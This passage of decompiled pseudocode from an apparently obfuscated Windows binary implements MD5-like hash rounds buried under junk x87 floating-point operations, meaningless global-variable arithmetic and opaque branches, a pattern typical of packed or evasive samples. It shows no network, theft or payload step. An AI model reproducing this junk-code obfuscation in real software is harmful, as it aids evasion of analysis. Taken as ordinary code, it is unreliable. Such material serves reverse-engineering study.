				asm("fild dword [ebp+0x8]");
				_t486 = E0039CABC();
				_t790 = _v16;
				 *0x3ce550 = _t486;
				_t907 =  *0x3ce280; // 0xa4969772
				_a4 = _t907 - 0x4db83e0d;
				asm("fild dword [ebp+0x8]");
				asm("rol eax, 0xc");
				_t491 = ( !_t710 & _t790 | _t1105 & _t710) +  *((intOrPtr*)(_t1181 + 4)) + _v8 - 0x173848aa + _t710;
				_v28 = _t1215 + _v28;
				_t1218 =  *0x3ce584 + _v28;
				 *0x3ce584 = _t1218;
				_t914 =  *0x3ce478; // 0x80000000
				_a4 = _t914;
				asm("fild dword [ebp+0x8]");
				asm("ror edi, 0xf");
				_t1109 = ( !_t491 & _t1105 | _t491 & _t710) + _t790 +  *(_t1181 + 8) + 0x242070db + _t491;
				_v8 = _t491;
				_v28 = _t1218;
				_v16 = _t1109;
				_t492 = E0039CABC();
				 *0x3ce478 = _t492;
				asm("fld1");
				asm("fxch st0, st1");
				 *0x3ce500 =  *0x3ce500 + st0;
				_v28 =  *0x3ce130 -  *0x3c7730;
				asm("fsubr qword [ebp-0x18]");
				asm("fucompp");
				asm("fnstsw ax");
				 *0x3ce068 =  *0x3ce068 + st1;
				asm("fld1");
				_t1230 = st0;
				asm("faddp st2, st0");
				asm("fxch st0, st1");
				 *0x3ce130 = _t1230;
				if((_t492 & 0x00000044) == 0) {
					_t1230 =  *0x3ce25c -  *0x3c7724;
					 *0x3ce25c = _t1230;
				}
				_t792 = _v8;
				asm("ror eax, 0xa");
				_t499 = ( !_t1109 & _t710 | _t792 & _t1109) +  *((intOrPtr*)(_t1181 + 0xc)) + _v12 - 0x3e423112 + _t1109;
				_t923 =  *0x3ce038; // 0x80000000
				_a4 = 0xe3f5d559 - _t923;
				asm("fild dword [ebp+0x8]");
				_v28 = _t1230;
				_t1232 =  *0x3ce1e0 + _v28;
				 *0x3ce1e0 = _t1232;
				 *0x3ce038 =  *0x3ce038 + 1;
				 *0x3ce11c =  *0x3ce11c + 0x72bf59bf;
				asm("rol ebx, 0x7");
				_t712 = _t710 + ( !_t499 & _t792 | _t1109 & _t499) +  *((intOrPtr*)(_t1181 + 0x10)) - 0xa83f051 + _t499;
				_t1113 =  *0x3ce460; // 0x6c98b0f1
				_v12 = _t1113 - 0x385d27d1;
				asm("fild dword [ebp-0x8]");
				asm("rol ecx, 0xc");
				_t803 = ( !_t712 & _t1109 | _t499 & _t712) +  *((intOrPtr*)(_t1181 + 0x14)) + _v8 + 0x4787c62a + _t712;
				_v28 = _t1232;
				_a4 = _t712;
				 *0x3ce5fc =  *0x3ce5fc + _v28;
				 *0x3ce460 =  *0x3ce460 + 1;
				_t1236 =  *0x3ce150 *  *0x3c7720;
				asm("ror edx, 0xf");
				_t931 = ( !_t803 & _t499 | _t803 & _t712) +  *((intOrPtr*)(_t1181 + 0x18)) + _v16 - 0x57cfb9ed + _t803;
				 *0x3ce150 = _t1236;
				asm("ror eax, 0xa");
				_t501 = _t499 + ( !_t931 & _t712 | _t803 & _t931) +  *((intOrPtr*)(_t1181 + 0x1c)) - 0x2b96aff + _t931;
				_t718 =  *0x3ce00c; // 0x640f69c6
				_v16 = _t718;
				asm("fild dword [ebp-0xc]");
				asm("rol edi, 0x7");
				_t1129 = ( !_t501 & _t803 | _t931 & _t501) +  *((intOrPtr*)(_t1181 + 0x20)) + _a4 + 0x698098d8 + _t501;
				_a4 = _t1129;
				_v28 = _t1236;
				asm("fsubr qword [ebp-0x18]");
				 *0x3ce260 =  *0x3ce1a8 +  *0x3c7718;
				 *0x3ce1a8 =  *0x3ce1a8 - st2;
				 *0x3ce00c =  *0x3ce00c - 1;
				 *0x3ce2d0 =  *0x3ce2d0 +  *0x3c7710;
				asm("rol ecx, 0xc");
				_t805 = ( !_t1129 & _t931 | _t501 & _a4) +  *((intOrPtr*)(_t1181 + 0x24)) + _t803 - 0x74bb0851 + _a4;
				asm("ror edi, 0xf");
				_t1140 = ( !_t805 & _t501 | _t805 & _a4) +  *((intOrPtr*)(_t1181 + 0x28)) + _t931 - 0xa44f + _t805;
				asm("ror eax, 0xa");
				_t503 = ( !_t1140 & _a4 | _t805 & _t1140) +  *((intOrPtr*)(_t1181 + 0x2c)) + _t501 - 0x76a32842 + _t1140;
				 *0x3ce108 =  *0x3ce108 + 1;
				_v12 = _t503;
				_t943 =  *0x3ce5b4; // 0x1cd4718b
				_t946 =  *0x3ce430; // 0x9f0c3f1f
				_t508 = _v12;
				 *0x3ce178 = _t946 + ( *0x3ce178 & 0x0000ffff) - _t943 + ( *0x3ce108 & 0x0000ffff);
				 *0x3ce5b4 =  *0x3ce5b4 + 1;
				asm("rol ebx, 0x7");
				_t728 = ( !_t503 & _t805 | _t1140 & _t503) +  *((intOrPtr*)(_t1181 + 0x30)) + _a4 + 0x6b901122 + _t508;
				_t1243 =  *0x3ce188;
				asm("fsubr qword [0x3c7708]");
				_v28 = _t1243;
				_t806 =  *0x3ce5d4; // 0x6ad5
				_a4 = _t806;
				_v8 = _t805 + ( !_t728 & _t1140 | _t508 & _t728) +  *((intOrPtr*)(_t1181 + 0x34)) - 0x2678e6d;
				asm("fild dword [ebp+0x8]");
				 *0x3ce5d4 = E0039CABC();
				 *0x3ce5d8 = ( *0x3ce5d8 & 0x0000ffff) * 0x2be5ca7b;
				asm("rol ecx, 0xc");
				_t808 = _v8 + _t728;
				_t515 =  !_t808;
				_v16 = _t515;
				asm("ror edi, 0xf");
				_t1142 = (_t515 & _v12 | _t808 & _t728) +  *((intOrPtr*)(_t1181 + 0x38)) + _t1140 - 0x5986bc72 + _t808;
				_t520 =  !_t1142;
				_v24 = _t520;
				_t525 =  *0x3ce318 & 0x0000ffff;
				_a4 = _t525;
				asm("ror edx, 0xa");
				_t960 = (_t520 & _t728 | _t808 & _t1142) +  *((intOrPtr*)(_t1181 + 0x3c)) + _v12 + 0x49b40821 + _t1142;
				asm("fild dword [ebp+0x8]");
				_v8 = _t808;
				_v12 = _t960;
				_v40 = _t1243 * _v28;
				asm("fsubr qword [ebp-0x24]");
				_v40 =  *0x3ce0d8 -  *0x3c7700;
				asm("fucompp");
				asm("fnstsw ax");
				_t1250 =  *0x3ce0d8 + st1;
				 *0x3ce0d8 = _t1250;
				if((_t525 & 0x00000044) == 0) {
					 *0x3ce1c0 =  *0x3ce1c0 - 1;
					_t702 =  *0x3ce1c0; // 0xa815
					_a4 = _t702;
					asm("fild dword [ebp+0x8]");
					 *0x3ce200 = _t1250;
				}
				_t810 =  *0x3ce0f0; // 0xfafdf6a6
				 *0x3ce0c8 = _t810;
				asm("rol ebx, 0x5");
				_t961 =  *0x3ce430; // 0x9f0c3f1f
				_v40 =  *0x3ce1c8 -  *0x3c76f8;
				_v16 = _t961;
				asm("fild dword [ebp-0xc]");
				_a4 = _t728 + (_v16 & _t1142 | _t808 & _t960) +  *((intOrPtr*)(_t1181 + 4)) - 0x9e1da9e + _t960;
				_t530 = E0039CABC();
				_t731 = _v12;
				_t962 = _a4;
				 *0x3ce430 = _t530;
				 *0x3ce1c8 =  *0x3ce1c8 + st2;
				_t1256 =  *0x3ce348;
				_v40 = _t1256;
				_t814 = _v8 + (_v24 & _t731 | _t1142 & _t962) +  *((intOrPtr*)(_t1181 + 0x18)) - 0x3fbf4cc0;
				_t535 =  *0x3ce178; // 0x21a7
				_t536 = _t535;
				_v24 = _t536;
				_v8 = _t814;
				asm("fild dword [ebp-0x14]");
				asm("fcomp qword [ebp-0x24]");
				asm("fnstsw ax");
				if((_t536 & 0x00000041) != 0) {
					 *0x3ce5d8 = ( *0x3ce5d8 & 0x0000ffff) - 0x291efe1c;
				} else {
					_t899 =  *0x3ce4fc; // 0x94b9
					_v24 = _t899 - 0x4fe63d4d;
					asm("fild dword [ebp-0x14]");
					_v40 = _t1256;
					_t701 = E0039CABC();
					_t814 = _v8;
					_t962 = _a4;
					 *0x3ce2f8 = _t701;
					 *0x3ce078 =  *0x3ce078 + st1;
				}
				asm("rol ecx, 0x9");
				_t815 = _t814 + _t962;
				_v40 =  *0x3ce554 -  *0x3c76f0;
				 *0x3ce394 =  *0x3ce394 + _v40;
				_v40 =  *0x3ce250 -  *0x3ce5a0 +  *0x3c76e8;
				_t1265 =  *0x3ce2b8 * _v40;
				 *0x3ce2b8 = _t1265;
				_t539 =  *0x3ce498; // 0x3a4fa324
				_t540 = _t539 + 0xabf9f9a;
				_v24 = _t540;
				asm("fild dword [ebp-0x14]");
				_v40 = _t1265;
				asm("fcomp qword [ebp-0x24]");
				asm("fnstsw ax");
				if((_t540 & 0x00000041) == 0) {
					 *0x3ce4f4 = 0x1c86;
				}
				_v40 =  *0x3ce2a0 -  *0x3c76e4;
				asm("fsubr qword [ebp-0x24]");
				_v40 =  *0x3ce260;
				asm("rol edi, 0xe");
				_t1144 = ( !_t731 & _t962 | _t815 & _t731) +  *((intOrPtr*)(_t1181 + 0x2c)) + _t1142 + 0x265e5a51 + _t815;
				asm("ror eax, 0xc");
				_t549 = ( !_a4 & _t815 | _t1144 & _a4) +  *_t1181 + _v12 - 0x16493856 + _t1144;
				 *0x3ce3e0 =  *0x3ce3e0 * _v40;
				asm("rol edx, 0x5");
				_a4 = ( !_t815 & _t1144 | _t815 & _t549) +  *((intOrPtr*)(_t1181 + 0x14)) + _a4 - 0x29d0efa3 + _t549;
				 *0x3ce260 =  *0x3ce260 + st1;
				 *0x3ce51c = 0x7028;
				_v40 =  *0x3c76e0 -  *0x3ce0a0;
				 *0x3ce054 =  *0x3ce054 * _v40;
				_t816 = _a4;
				asm("rol ebx, 0x9");
				asm("fsubr qword [0x3c76d0]");
				_t740 = ( !_t1144 & _t549 | _t1144 & _a4) +  *((intOrPtr*)(_t1181 + 0x28)) + _t815 + 0x2441453 + _t816;
				 *0x3ce490 =  *0x3ce198 +  *0x3c76d8;
				asm("rol ecx, 0xe");
				_t820 = ( !_t549 & _t816 | _t740 & _t549) +  *((intOrPtr*)(_t1181 + 0x3c)) + _t1144 - 0x275e197f + _t740;
				_v16 = _t820;
				_v40 =  *0x3c76c8 -  *0x3ce02c;
				asm("ror edi, 0xc");
				 *0x3ce4c8 =  *0x3ce4c8 + _v40;
				_t1151 = _t549 + ( !_a4 & _t740 | _t820 & _a4) +  *((intOrPtr*)(_t1181 + 0x10)) - 0x182c0438 + _v16;
				 *0x3ce02c =  *0x3ce02c + st1;
				 *0x3ce3a0 =  *0x3ce3a0 - st2;
				_t989 =  *0x3ce550; // 0xa046b428
				_v24 = _t989;
				_v40 =  *0x3ce3a0 -  *0x3c76c0;
				asm("fild dword [ebp-0x14]");
				 *0x3ce550 = E0039CABC();
				asm("fsubr qword [0x3c76b8]");
				_t551 = _v16;
				_v40 =  *0x3ce538;
				 *0x3ce528 =  *0x3ce528 * _v40;
				asm("rol ecx, 0x5");
				_t828 = ( !_t740 & _t551 | _t740 & _t1151) +  *((intOrPtr*)(_t1181 + 0x24)) + _a4 + 0x21e1cde6 + _t1151;
				_v40 =  *0x3ce448 -  *0x3c76b4 +  *0x3c76b0;
				_t553 =  *0x3ce108; // 0x5dc4
				 *0x3ce108 =  *0x3ce108 + 1;
				_a4 = _t553 + 0x2514824;
				asm("rol ebx, 0x9");
				_t742 = ( !_t551 & _t1151 | _t551 & _t828) +  *((intOrPtr*)(_t1181 + 0x38)) + _t740 - 0x3cc8f82a + _t828;
				asm("fild dword [ebp+0x8]");
				asm("fcomp qword [ebp-0x24]");
				asm("fnstsw ax");
				if((_t553 & 0x00000001) == 0) {
					 *0x3ce194 =  *0x3ce194 + 0xfdb75cbf;
				}
				_t559 =  *0x3ce37c; // 0x277c3928
				 *0x3ce37c =  *0x3ce37c - 1;
				asm("rol edx, 0xe");
				_t1004 = ( !_t1151 & _t828 | _t742 & _t1151) +  *((intOrPtr*)(_t1181 + 0xc)) + _v16 - 0xb2af279 + _t742;
				_t560 = _t559 - 0x565b66a6;
				_v16 = _t1004;
				if(_t560 < 0x796ef28a) {
					asm("fcomp qword [0x3c76a0]");
					asm("fnstsw ax");
					if((_t560 & 0x00000041) == 0) {
						 *0x3ce2f0 =  *0x3ce2f0 + st2;
						st0 =  *0x3ce2f0;
					}
				}
				_t1006 =  *0x3ce3f0; // 0x7d983143
				_t566 =  *0x3ce3f4; // 0xc3d0299e
				 *0x3ce4a0 = _t1006;
				 *0x3ce4a4 = _t566;
				asm("ror edi, 0xc");
				_t1153 = ( !_t828 & _t742 | _t1004 & _t828) +  *((intOrPtr*)(_t1181 + 0x20)) + _t1151 + 0x455a14ed + _v16;
				 *0x3ce3f0 =  *0x3ce3f0 - st2;
				_t1299 =  *0x3ce240;
				_t569 =  *0x3ce154; // 0x94dc
				_v24 = _t569;
				asm("rol edx, 0x5");
				asm("fild dword [ebp-0x14]");
				_t1013 = ( !_t742 & _v16 | _t742 & _t1153) + _t828 +  *((intOrPtr*)(_t1181 + 0x34)) - 0x561c16fb + _t1153;
				_v12 = _t1153;
				_a4 = _t1013;
				asm("fsubp st1, st0");
				 *0x3ce2c0 = _t1299;
				 *0x3ce40c =  *0x3ce40c + 1;
				_t570 =  *0x3ce40c; // 0x42a5c331
				if(0x75e79405 - _t570 != 0xa5758a92) {
					 *0x3ce1d0 =  *0x3ce1d0 + 1;
					_t1102 =  *0x3ce1d0; // 0x2f751c97
					_v24 = 0x77aef24a - _t1102;
					asm("fild dword [ebp-0x14]");
					_v40 = _t1299;
					_t898 =  *0x3ce534; // 0x629d912f
					asm("fsubr qword [ebp-0x24]");
					_v24 = _t898;
					_v40 =  *0x3ce344;
					asm("fild dword [ebp-0x14]");
					_t699 = E0039CABC();
					_t1013 = _a4;
					 *0x3ce534 = _t699;
					 *0x3ce344 =  *0x3ce344 - st1;
				}
				_v40 =  *0x3ce054;
				_t1302 =  *0x3ce3d8 + _v40;
				_t573 =  *(_t1181 + 8);
				asm("fcomp qword [0x3c7698]");
				asm("rol ecx, 0x9");
				asm("fnstsw ax");
				_t839 = ( !_v16 & _t1153 | _v16 & _t1013) + _t742 + _t573 - 0x3105c08 + _t1013;
				_v8 = _t839;
				if((_t573 & 0x00000001) == 0) {
					_t696 =  *0x3ce478; // 0x80000000
					_v24 = _t696;
					asm("fild dword [ebp-0x14]");
					 *0x3ce5a0 = _t1302;
					 *0x3ce478 =  *0x3ce478 + 1;
				}
				_v40 =  *0x3ce2a4;
				asm("fsubr qword [ebp-0x24]");
				_t579 = _a4;
				asm("rol edi, 0xe");
				_t1155 = ( !_t1153 & _t1013 | _t839 & _t1153) +  *((intOrPtr*)(_t1181 + 0x1c)) + _v16 + 0x676f02d9 + _t839;
				 *0x3ce2a4 =  *0x3ce2b8 +  *0x3c7690;
				asm("ror ebx, 0xc");
				 *0x3ce2b8 =  *0x3ce2b8 - st2;
				_t747 = ( !_t579 & _t839 | _t1155 & _t579) +  *((intOrPtr*)(_t1181 + 0x30)) + _v12 - 0x72d5b376 + _t1155;
				_t1309 =  *0x3ce130 -  *0x3c7688;
				 *0x3ce538 = _t1309;
				asm("rol eax, 0x4");
				_a4 = (_t839 ^ _t1155 ^ _t747) +  *((intOrPtr*)(_t1181 + 0x14)) + _t579 - 0x5c6be + _t747;
				_t582 =  *0x3ce46c; // 0xd500
				_v24 = _t582;
				asm("fild dword [ebp-0x14]");
				_v40 = _t1309;
				asm("fsubr qword [0x3c7680]");
				asm("fsubr qword [ebp-0x24]");
				 *0x3ce46c = E0039CABC();
				 *0x3ce370 =  *0x3ce370 + st2;
				_t844 = (_t1155 ^ _t747 ^ _a4) +  *((intOrPtr*)(_t1181 + 0x20)) + _v8 - 0x788e097f;
				_t1026 =  *0x3ce020; // 0x829
				asm("rol ecx, 0xb");
				if(0xc9326125 - _t1026 < 0x5c18c1e4) {
					_v40 =  *0x3ce0f4;
					 *0x3ce450 =  *0x3ce450 + _v40;
				}
				_t1029 = _a4;
				_t845 = _t844 + _t1029;
				_v40 =  *0x3ce1b0 -  *0x3c7678;
				_v8 = _t845;
				 *0x3ce5b8 =  *0x3ce5b8 * _v40;
				_v20 =  *0x3ce338;
				_t1318 =  *0x3ce50c;
				_t1156 =  *0x3ce4f4; // 0x5f03
				_v40 = _t1318;
				_v24 = _t1156;
				asm("rol eax, 0x10");
				_t591 = (_t845 ^ _t747 ^ _t1029) +  *((intOrPtr*)(_t1181 + 0x2c)) + _t1155 + 0x6d9d6122 + _t845;
				asm("fild dword [ebp-0x14]");
				_t846 = _t845 ^ _t591;
				asm("fsubr qword [ebp-0x24]");
				asm("fsubr qword [ebp-0x10]");
				 *0x3ce338 = _t1318;
				_t1320 =  *0x3ce50c - st1;
				 *0x3ce50c = _t1320;
				_t1030 =  *0x3ce288; // 0x6ce1ec48
				_t748 =  *0x3ce430; // 0x9f0c3f1f
				 *0x3ce288 = _t748 + _t1030 + 0xff721776;
				 *0x3ce430 =  *0x3ce430 - 1;
				asm("ror edi, 0x9");
				_t1162 = (_t846 ^ _t1029) +  *((intOrPtr*)(_t1181 + 0x38)) + _t747 - 0x21ac7f4 + _t591;
				asm("rol ebx, 0x4");
				_t751 = (_t846 ^ _t1162) +  *((intOrPtr*)(_t1181 + 4)) + _a4 - 0x5b4115bc + _t1162;
				 *0x3ce294 = ( *0x3ce33c & 0x0000ffff) + 0x62927472;
				asm("rol ecx, 0xb");
				_t854 = (_t591 ^ _t1162 ^ _t751) +  *((intOrPtr*)(_t1181 + 0x10)) + _v8 + 0x4bdecfa9 + _t751;
				_v8 = _t854;
				asm("rol eax, 0x10");
				_v16 = (_t854 ^ _t1162 ^ _t751) +  *((intOrPtr*)(_t1181 + 0x1c)) + _t591 - 0x944b4a0 + _t854;
				_t594 =  *0x3ce48c; // 0x47ff
				_t1040 =  *0x3ce2fc; // 0x3a84af9e
				_a4 = _t1040 - _t594;
				asm("fild dword [ebp+0x8]");
				_v40 = _t1320;
				_t596 =  *0x3ce4ac; // 0xea843028
				asm("fsubr qword [ebp-0x24]");
				_v40 =  *0x3ce3b8;
				 *0x3ce4ac =  *0x3ce4ac - 1;
				 *0x3ce2fc =  *0x3ce2fc + 1;
				_a4 = 0x668f75ea - _t596;
				asm("fild dword [ebp+0x8]");
				_t1322 = _v40;
				asm("fucompp");
				asm("fnstsw ax");
				if((_t596 & 0x00000044) != 0) {
					_t597 =  *0x3ce264; // 0x80000000
					_a4 = _t597;
					asm("fild dword [ebp+0x8]");
					_v40 = _t1322;
					asm("fsubr qword [0x3c7668]");
					asm("fsubr qword [ebp-0x24]");
					_t598 = E0039CABC();
					_t854 = _v8;
					 *0x3ce264 = _t598;
					_t1326 =  *0x3ce490 - st2;
					 *0x3ce490 = _t1326;
				} else {
					_v40 =  *0x3ce1d4;
					 *0x3ce1f0 =  *0x3ce1f0 + _v40;
					_t1326 =  *0x3ce1d4 + st1;
					 *0x3ce1d4 = _t1326;
				}
				_t599 = _v16;
				_t855 = _t854 ^ _t599;
				asm("ror edi, 0x9");
				_t1164 = (_t855 ^ _t751) +  *((intOrPtr*)(_t1181 + 0x28)) + _t1162 - 0x41404390 + _t599;
				_t600 =  *0x3ce264; // 0x80000000
				_a4 = _t600 + 0xb1cf4e9;
				asm("fild dword [ebp+0x8]");
				_v40 = _t1326;
				_t1327 =  *0x3ce314;
				asm("fsubr qword [ebp-0x24]");
				 *0x3ce43c = _t1327;
				_t602 =  *0x3ce4a8; // 0x1d14
				_a4 = _t602;
				asm("rol ebx, 0x4");
				_t753 = (_t855 ^ _t1164) + _t751 +  *((intOrPtr*)(_t1181 + 0x34)) + 0x289b7ec6 + _t1164;
				asm("fild dword [ebp+0x8]");
				_v40 = _t1327;
				asm("fsubr qword [ebp-0x24]");
				 *0x3ce4a8 = E0039CABC();
				_t1330 =  *0x3ce228 -  *0x3c7660;
				 *0x3ce228 = _t1330;
				_t859 = (_v16 ^ _t1164 ^ _t753) +  *_t1181 + _v8 - 0x155ed806;
				_t1052 =  *0x3ce23c; // 0x5c192b57
				asm("rol ecx, 0xb");
				if(0x354264a1 - _t1052 == 0x25e92023) {
					 *0x3ce000 =  *0x3ce000 -  *0x3ce4f8;
					_t1330 =  *0x3ce4f8 + st1;
					 *0x3ce4f8 = _t1330;
				}
				 *0x3ce2c4 =  *0x3ce2c4 + 1;
				_t1053 =  *0x3ce2c4; // 0x9cc1
				_t1054 =  *0x3ce308; // 0x7f16f77b
				_t860 = _t859 + _t753;
				 *0x3ce308 = _t1054 * _t1053;
				_v8 = _t860;
				_t612 =  *0x3ce040; // 0x80000000
				_a4 = _t612 + 0x32fc4142;
				_t614 =  *0x3ce318; // 0x83ae
				_t615 = _t614;
				asm("fild dword [ebp+0x8]");
				_a4 = _t615;
				_v28 = _t1330;
				asm("rol edx, 0x10");
				_t1058 = (_t860 ^ _t1164 ^ _t753) +  *((intOrPtr*)(_t1181 + 0xc)) + _v16 - 0x2b10cf7b + _t860;
				asm("fild dword [ebp+0x8]");
				_v16 = _t1058;
				_v40 = _t1330;
				asm("fsubr qword [ebp-0x24]");
				asm("fcomp qword [ebp-0x18]");
				asm("fnstsw ax");
				 *0x3ce428 =  *0x3ce428 - st2;
				if((_t615 & 0x00000001) == 0) {
					 *0x3ce000 = 0xff000000;
					 *0x3ce004 = 0xc1b4c1fe;
				}
				_t617 = _t860 ^ _t1058;
				asm("ror ecx, 0x9");
				_t865 = (_t617 ^ _t753) +  *((intOrPtr*)(_t1181 + 0x18)) + _t1164 + 0x4881d05 + _t1058;
				 *0x3ce4fc = ( *0x3ce4fc & 0x0000ffff) * 0xc16a253e;
				_t1335 =  *0x3ce148 +  *0x3c7658;
				asm("rol edx, 0x4");
				_t1060 = (_t617 ^ _t865) +  *((intOrPtr*)(_t1181 + 0x24)) + _t753 - 0x262b2fc7 + _t865;
				_v40 = _t1335;
				_t1166 = _v8 + (_v16 ^ _t865 ^ _t1060) +  *((intOrPtr*)(_t1181 + 0x30)) - 0x1924661b;
				_t626 =  *0x3ce308; // 0x7f16f77b
				_a4 = _t626;
				asm("fild dword [ebp+0x8]");
				_t1336 = _t1335 + _v40;
				_t629 = ( *0x3ce570 & 0x0000ffff) - 0x39e1779e;
				_a4 = _t629;
				_v40 = _t1336;
				asm("fild dword [ebp+0x8]");
				asm("fcomp qword [ebp-0x24]");
				asm("fnstsw ax");
				if((_t629 & 0x00000001) == 0) {
					 *0x3ce2a4 = 0x4ebe7029;
				}
				_t630 =  *0x3ce04c; // 0xe8ff
				_a4 = _t630;
				asm("rol edi, 0xb");
				_t632 = _t1060 + _t1166;
				asm("fild dword [ebp+0x8]");
				_v8 = _t632;
				_v40 = _t1336;
				 *0x3ce054 =  *0x3ce188 + _v40;
				 *0x3ce188 =  *0x3ce188 + st2;
				_t1167 =  *0x3ce58c; // 0x7fffffff
				_a4 = 0xb5dea224 - _t1167;
				asm("fild dword [ebp+0x8]");
				asm("fsubp st1, st0");
				 *0x3ce58c =  *0x3ce58c + 1;
				asm("rol edi, 0x10");
				_t1173 = (_t632 ^ _t865 ^ _t1060) +  *((intOrPtr*)(_t1181 + 0x3c)) + _v16 + 0x1fa27cf8 + _t632;
				_t867 =  *0x3ce194; // 0xdd6f5169
				asm("ror ebx, 0x9");
				_t762 = (_t632 ^ _t1173 ^ _t1060) + _t865 +  *(_t1181 + 8) - 0x3b53a99b + _t1173;
				_v12 = _t762;
				if(_t867 >= 0x5c497b9d) {
					_t693 =  *0x3ce1ec; // 0x6050
					_a4 = 0x36a2a0ee - _t693;
					_t632 = _v8;
					asm("fild dword [ebp+0x8]");
					asm("fsubp st1, st0");
				}
				_v40 =  *0x3ce590 +  *0x3c7650;
				_t1345 =  *0x3ce250 + _v40;
				 *0x3ce250 = _t1345;
				_t868 =  *0x3ce30c; // 0x3b604364
				_a4 = _t868 + 0x14a31c62;
				asm("fild dword [ebp+0x8]");
				_t358 = _t1060 - 0xbd6ddbc; // -198571197
				_t1061 = (( !_t632 | _t762) ^ _t1173) +  *_t1181 + _t358;
				asm("rol edx, 0x6");
				_v40 = _t1345;
				_t637 =  *0x3ce060; // 0x54bf
				_t871 = _t637 + 0x12c6abfb;
				_a4 = _t871;
				_v40 =  *0x3ce248 + _v40;
				_t872 = _t871 | 0xffffffff;
				 *0x3ce060 =  *0x3ce060 + _t872;
				asm("fild dword [ebp+0x8]");
				asm("fcomp qword [ebp-0x24]");
				asm("fnstsw ax");
				_t1349 =  *0x3ce248 + st1;
				 *0x3ce248 = _t1349;
				 *0x3ce30c =  *0x3ce30c + 1;
				if((_t637 & 0x00000041) == 0) {
					_t690 =  *0x3ce558; // 0xa8f7
					_a4 = _t690 - 0x2eacad8;
					asm("fild dword [ebp+0x8]");
					_v40 = _t1349;
					 *0x3ce1a8 =  *0x3ce1a8 * _v40;
					 *0x3ce558 =  *0x3ce558 + _t872;
				}
				_t873 =  *0x3ce368; // 0x80000000
				_v24 = _t873;
				_a4 = _t1061 + _t762;
				_v40 =  *0x3ce25c -  *0x3c764c;
				asm("fild dword [ebp-0x14]");
				 *0x3ce368 = E0039CABC();
				 *0x3ce25c =  *0x3ce25c - st1;
				_t1356 =  *0x3ce078 - st1;
				_t640 = _a4;
				asm("rol ebx, 0xa");
				_t764 = (( !_t1173 | _a4) ^ _t762) +  *((intOrPtr*)(_t1181 + 0x1c)) + _v8 + 0x432aff97 + _t640;
				 *0x3ce078 = _t1356;
				_t1068 =  *0x3ce318; // 0x83ae
				_v24 = _t1068;
				asm("rol edi, 0xf");
				asm("fild dword [ebp-0x14]");
				_v40 = _t1356;
				asm("fsubr qword [ebp-0x24]");
				_t642 = E0039CABC();
				 *0x3ce318 = _t642;
				_t879 =  *0x3ce1e8; // 0xa3c3
				_v24 = _t879;
				_t1175 = (( !_v12 | _t764) ^ _t640) +  *((intOrPtr*)(_t1181 + 0x38)) + _t1173 - 0x546bdc59 + _t764;
				_v40 =  *0x3ce0a4 +  *0x3c7640 +  *0x3c763c;
				asm("fild dword [ebp-0x14]");
				_t1363 = _v40;
				asm("fucompp");
				asm("fnstsw ax");
				if((_t642 & 0x00000044) == 0) {
					_t687 =  *0x3ce378; // 0x1dce930
					_v24 = 0xd16f8291 - _t687;
					asm("fild dword [ebp-0x14]");
					_v40 = _t1363;
					_t1101 =  *0x3ce55c; // 0x0
					_t1394 =  *0x3ce1d8 + _v40;
					_v24 = _t1101;
					_v40 = _t1394;
					asm("fild dword [ebp-0x14]");
					_t1363 = _t1394 + _v40;
					 *0x3ce55c = E0039CABC();
				}
				_t880 = _a4;
				 *0x3ce320 = ( *0x3ce320 & 0x0000ffff) + 0x71926f2f;
				asm("ror eax, 0xb");
				_t645 = (( !_t880 | _t1175) ^ _t764) +  *((intOrPtr*)(_t1181 + 0x14)) + _v12 - 0x36c5fc7 + _t1175;
				asm("rol ecx, 0x6");
				_t882 = (( !_t764 | _t645) ^ _t1175) +  *((intOrPtr*)(_t1181 + 0x30)) + _t880 + 0x655b59c3 + _t645;
				asm("rol edx, 0xa");
				_t1088 = (( !_t1175 | _t882) ^ _t645) +  *((intOrPtr*)(_t1181 + 0xc)) + _t764 - 0x70f3336e + _t882;
				asm("rol edi, 0xf");
				_t1177 = (( !_t645 | _t1088) ^ _t882) +  *((intOrPtr*)(_t1181 + 0x28)) + _t1175 - 0x100b83 + _t1088;
				asm("ror eax, 0xb");
				_v12 = (( !_t882 | _t1177) ^ _t1088) +  *((intOrPtr*)(_t1181 + 4)) + _t645 - 0x7a7ba22f + _t1177;
				_t648 =  *0x3ce1fc; // 0x80000000
				_t775 =  *0x3ce434; // 0xb4e84fb0
				_a4 = _t775 + _t648 + 0x86a087d7;
				asm("fild dword [ebp+0x8]");
				_v40 = _t1363;
				_t1365 =  *0x3ce520 + _v40;
				 *0x3ce520 = _t1365;
				_t650 =  *0x3ce268; // 0xd18b
				_a4 = _t650;
				asm("fild dword [ebp+0x8]");
				_v40 = _t1365;
				_t1367 =  *0x3ce470 * _v40;
				 *0x3ce470 = _t1367;
				_t657 =  *0x3ce5e8; // 0xa9600000
				_t777 =  *0x3ce5ec; // 0xc1e156dd
				 *0x3ce3c0 = _t657;
				_t658 = _v12;
				 *0x3ce3c4 = _t777;
				asm("rol ecx, 0x6");
				_t884 = (( !_t1088 | _v12) ^ _t1177) +  *((intOrPtr*)(_t1181 + 0x20)) + _t882 + 0x6fa87e4f + _t658;
				_t783 =  *0x3ce5f8; // 0x92887c61
				asm("rol edx, 0xa");
				 *0x3ce5f8 = _t783 * 0x50624a17;
				_t785 = _t884 + _t1088 + (( !_t1177 | _t884) ^ _t658) +  *((intOrPtr*)(_t1181 + 0x3c)) - 0x1d31920;
				 *0x3ce140 =  *0x3ce140 - 1;
				_t663 =  *0x3ce140 & 0x0000ffff;
				_t1091 =  *0x3ce4bc; // 0x45d8d594
				_a4 = _t1091 + _t663;
				asm("rol edi, 0xf");
				_t1179 = (( !_t658 | _t785) ^ _t884) +  *((intOrPtr*)(_t1181 + 0x18)) + _t1177 - 0x5cfebcec + _t785;
				asm("fild dword [ebp+0x8]");
				_v40 = _t1367;
				_t1369 = _v40;
				asm("fucompp");
				asm("fnstsw ax");
				if((_t663 & 0x00000044) == 0) {
					_t685 =  *0x3ce4e8; // 0x6bb26d6e
					_t686 = _t685 + 0x550f22a0;
					_a4 = _t686;
					asm("fild dword [ebp+0x8]");
					_v40 = _t1369;
					_t1390 =  *0x3c7638;
					asm("fucompp");
					asm("fnstsw ax");
					if((_t686 & 0x00000044) == 0) {
						_t1100 =  *0x3ce37c; // 0x277c3928
						_a4 = _t1100;
						asm("fild dword [ebp+0x8]");
						_v40 = _t1390;
						 *0x3ce1d4 =  *0x3ce1d4 + _v40;
						 *0x3ce37c =  *0x3ce37c - 1;
					}
				}
				_t1371 =  *0x3ce590 + st1;
				asm("ror eax, 0xb");
